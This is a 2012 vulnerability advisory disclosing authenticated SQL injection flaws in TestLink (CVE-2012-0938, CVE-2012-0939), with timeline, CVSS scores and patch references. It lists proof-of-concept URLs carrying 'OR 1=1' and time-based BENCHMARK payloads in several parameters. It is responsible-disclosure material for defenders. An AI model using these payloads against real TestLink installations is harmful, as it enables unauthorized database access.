------------------ Information ------------------ Name: SQL Injection Vulnerabilities in TestLink Software tested: TL v1.8.5b & checked in v1.9.3 (prior version may be affected) Vendor Homepage: http://www.teamst.org Vendor Notification: 27 January 2012 Vendor Patch: 4 February 2012 Public Disclosure: 20 February 2012 CVE: CVE-2012-0938 & CVE-2012-0939 Solution Status: Fixed by Vendor ------------------ Description ------------------ TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically. TestLink is a GPL licensed open source project. ------------------ Details ------------------ CVE-2012-0938: TestLink v1.8.5b & 1.9.3 are affected by some SQL Injection vulnerabilities (other versions also maybe affected). To successfully exploit these vulnerabilities, a remote attacker must login with a valid user account. Some cases need a different role to be exploited. CVSS v2: 6.5 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P Example PoC URLs are: http://example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1 http://example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1 http://example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND 3653=BENCHMARK(5000000,MD5(1)) http://example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) CVE-2012-0939: TestLink v1.8.5b is affected by some SQL Injection vulnerabilities (other versions also maybe affected). To successfully exploit these vulnerabilities, a remote attacker must login with a valid user account. Some cases need a different role to be exploited. CVSS v2: 6.5 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P Example PoC URLs are: http://example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622 OR 1=1 http://example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) ------------------ Solution ------------------ The vendor fixed these vulnerabilities in a patch for version 1.9.3. Please see the references. ------------------ References ------------------ Vendor URL / Patch : http://mantis.testlink.org/view.php?id=4906 CVE-2012-0938: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0938 CVE-2012-0939: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0939 ------------------ Credits ------------------ Researcher: Juan M. Natal Company: INTECO (http://www.inteco.es) Contact: jnatal [at] cert [dot] inteco [dot] es Thanks to: J. Valentin Gutierrez (@vnico) & Juan C. Montes (@jcmontes_tec)